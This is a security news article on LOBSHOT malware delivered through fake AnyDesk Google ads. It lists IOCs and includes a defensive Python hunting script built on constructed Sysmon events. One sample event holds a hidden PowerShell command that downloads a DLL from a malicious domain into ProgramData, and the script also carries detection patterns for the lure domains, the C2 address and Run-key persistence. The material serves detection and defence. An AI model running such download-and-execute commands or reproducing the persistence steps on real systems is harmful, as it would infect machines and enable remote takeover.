New LOBSHOT Malware Deployed Via Google Ads

Cybersecurity researchers at Elastic Security Labs have discovered a new malware, called ‘LOBSHOT,’ that is being distributed through Google ads.

What is LOBSHOT Malware?

The ads, which promoted the legitimate AnyDesk remote management software, led users to a fake AnyDesk site at amydeecke[.]website. That site served a malicious MSI installer which ran a PowerShell command to download a DLL from download-cdn[.]com, a domain previously associated with the TA505/Clop ransomware gang. It is unclear whether TA505 still controls the domain, as its ownership has changed in the past.

The downloaded DLL is the LOBSHOT payload. It is written to the C:\ProgramData directory and launched with rundll32.exe.

Once running, LOBSHOT checks whether Microsoft Defender is running and, if it is, terminates to avoid detection. If Defender is not detected, the malware configures a Registry Run key so that it starts automatically at Windows logon, then transmits system information from the infected device, including the list of running processes, to its command-and-control server.

LOBSHOT's core feature is an hVNC (hidden VNC) module. It creates a hidden desktop on the victim's machine that the threat actors can drive with their own mouse and keyboard as if they were sitting in front of it, while the logged-in user sees nothing. With this kind of access, the threat actors have complete control over the device, allowing them to execute commands, steal data, and even deploy further malware payloads.

IOCS

Indicator | Type | Reference
95.217.125[.]200 | IP address | LOBSHOT C2
e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6 | SHA-256 | LOBSHOT
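The infection chain and the IOCs above translate directly into hunting logic. The script below is an added example, not code from the article or from the LOBSHOT researchers: it runs over constructed Sysmon-style events (the field names and the sample command lines are assumptions for illustration, chosen to mirror the chain described: msiexec → PowerShell download from download-cdn[.]com → rundll32.exe loading a DLL from C:\ProgramData → Run-key persistence → connection to the listed C2 address) and flags any process that exhibits two or more of those behaviours, then reconstructs its parent chain.

```python
"""
LOBSHOT chain hunt over Sysmon-style telemetry.

Added example, not code from the article or from the LOBSHOT researchers.
The event field names (id/pid/ppid/image/cmdline/target/details/dest_ip/
image_loaded/hash) and the sample events are assumptions for illustration;
the indicators are the ones listed in the IOC table.
"""
from __future__ import annotations

from typing import Any

# Indicators from the article (defanged in prose only).
LOBSHOT_C2_IP = "95.217.125.200"
LOBSHOT_SHA256 = "e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6"
LURE_DOMAINS = ("amydeecke.website", "download-cdn.com")
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample telemetry (not real logs). Sysmon event IDs used:
# 1 = process creation, 3 = network connection, 7 = image loaded,
# 13 = registry value set.
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"id": 1, "pid": 1201, "ppid": 700,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\bob\Downloads\AnyDesk.msi /qn"},
    {"id": 1, "pid": 1320, "ppid": 1201,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://download-cdn.com/x.dll -OutFile C:\ProgramData\x.dll"'},
    {"id": 1, "pid": 1410, "ppid": 1320,
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    {"id": 7, "pid": 1410, "image_loaded": r"C:\ProgramData\x.dll",
     "hash": LOBSHOT_SHA256},
    {"id": 13, "pid": 1410, "target": RUN_KEY + r"\Updater",
     "details": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    {"id": 3, "pid": 1410, "dest_ip": LOBSHOT_C2_IP, "dest_port": 443},
    # Benign noise: rundll32 invoking a system DLL, no ProgramData path.
    {"id": 1, "pid": 2000, "ppid": 900,
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rundll32_from_programdata(events: list[dict]) -> list[int]:
    """rundll32.exe launched with a DLL path under C:\\ProgramData."""
    return [e["pid"] for e in events
            if e["id"] == 1 and _basename(e["image"]) == "rundll32.exe"
            and "\\programdata\\" in e["cmdline"].lower()]


def run_key_persistence(events: list[dict]) -> list[int]:
    """Run-key value whose command is rundll32 on a ProgramData DLL."""
    hits = []
    for e in events:
        if e["id"] != 13 or not e["target"].lower().startswith(RUN_KEY.lower() + "\\"):
            continue
        details = e["details"].lower()
        if "rundll32" in details and "\\programdata\\" in details:
            hits.append(e["pid"])
    return hits


def c2_connections(events: list[dict]) -> list[int]:
    return [e["pid"] for e in events if e["id"] == 3 and e["dest_ip"] == LOBSHOT_C2_IP]


def hash_matches(events: list[dict]) -> list[int]:
    """Image-load events whose DLL hash is the published LOBSHOT sample."""
    return [e["pid"] for e in events
            if e["id"] == 7 and e.get("hash", "").lower() == LOBSHOT_SHA256]


def lure_downloads(events: list[dict]) -> list[int]:
    """Process command lines referencing the lure or download domains."""
    return [e["pid"] for e in events
            if e["id"] == 1 and any(d in e["cmdline"].lower() for d in LURE_DOMAINS)]


def ancestry(events: list[dict], pid: int) -> list[str]:
    """Walk ppid links and return image basenames from root ancestor to pid."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain, seen, cur = [], set(), pid
    while cur in by_pid and cur not in seen:
        seen.add(cur)
        chain.append(_basename(by_pid[cur]["image"]))
        cur = by_pid[cur]["ppid"]
    return list(reversed(chain))


def hunt(events: list[dict]) -> dict[str, Any]:
    """Score each pid by how many LOBSHOT behaviours it shows (>= 2 is suspect)."""
    findings: dict[str, Any] = {
        "rundll32_programdata": rundll32_from_programdata(events),
        "run_key_persistence": run_key_persistence(events),
        "c2_connection": c2_connections(events),
        "hash_match": hash_matches(events),
        "lure_download": lure_downloads(events),
    }
    score: dict[int, int] = {}
    for pids in findings.values():
        for pid in pids:
            score[pid] = score.get(pid, 0) + 1
    findings["suspect_pids"] = sorted(p for p, s in score.items() if s >= 2)
    findings["chains"] = {p: ancestry(events, p) for p in findings["suspect_pids"]}
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(hunt(SAMPLE_EVENTS), indent=2))
```

The scoring threshold is deliberate: rundll32.exe with a DLL outside System32 is common enough in enterprise fleets to be noisy on its own, but the same process also writing a Run key, matching the sample hash, or talking to the listed C2 address is not. The hash and IP are the weakest long-term signals (attackers rotate both), so the behavioural checks should carry the rule once the indicators go stale.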


About the Author:

FirstHackersNews- Identifies Security
